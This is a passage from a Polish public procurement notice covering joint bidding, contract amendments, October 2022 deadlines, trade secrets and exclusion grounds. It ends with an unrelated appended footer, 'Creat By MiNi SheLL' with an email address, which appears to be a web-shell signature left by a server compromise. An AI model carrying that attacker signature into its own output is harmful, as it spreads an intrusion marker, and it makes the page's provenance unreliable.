(liderem),<br/>3)	jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zostanie wybrana, zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców,<br/>4)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia <br/>z postępowania oraz spełnianie warunków udziału w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie,<br/>5)	wypełniając formularz oferty, jak również inne dokumenty powołujące się <br/>na „Wykonawcę” należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika - lidera lub jednego ze współpartnerów,<br/>6)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do umowy w sprawie zamówienia publicznego oraz możliwości jej zmiany.<br/>26.1. Projektowane postanowienia umowy stanowią załącznik nr 7 do SWZ. <br/>Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy.<br/>26.2. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, <br/>w formie aneksu do niniejszej umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ust. 1 ustawy Prawo zamówień publicznych. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 p.z.p. oraz wskazanym w projektowanych postanowieniach umowy stanowiącym załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/jaroslaw</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-24 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 19.13.	Tajemnica przedsiębiorstwa:<br/>Protokół, oferty oraz wszelkie oświadczenia i zaświadczenia składane w postępowaniu o zamówienie publiczne są jawne. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji, Wykonawca powinien nie później niż w terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, <br/>iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca, w celu utrzymania w poufności tych informacji, powinien przekazać je w wydzielonym <br/>i odpowiednio oznaczonym pliku. Zamawiający udostępni na wniosek zainteresowanego jawną część dokumentacji.<br/>19.13.1 Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa <br/>w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji będzie traktowane, jako bezskuteczne i skutkować będzie ich odtajnieniem<br/><br/>Podstawy wykluczenia z postępowania, o których mowa w art. 108 ust. 1 p.z.p. <br/>i art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (obligatoryjne) oraz podstawy wykluczenia, o których mowa w art. 109 p.z.p. (fakultatywne). <br/>1.	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku <br/>do których zachodzi którakolwiek z okoliczności wskazanych:<br/>1)	w art. 108 ust. 1 ustawy p.z.p.,<br/>2)	w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - przez okres trwania okoliczności określonych w tym przepisie,<br/>3)	Zamawiający nie przewiduje wykluczenia wykonawcy na postawie art. 109 ust. 1 ustawy p.z.p.,

Creat By MiNi SheLL
Email: jattceo@gmail.com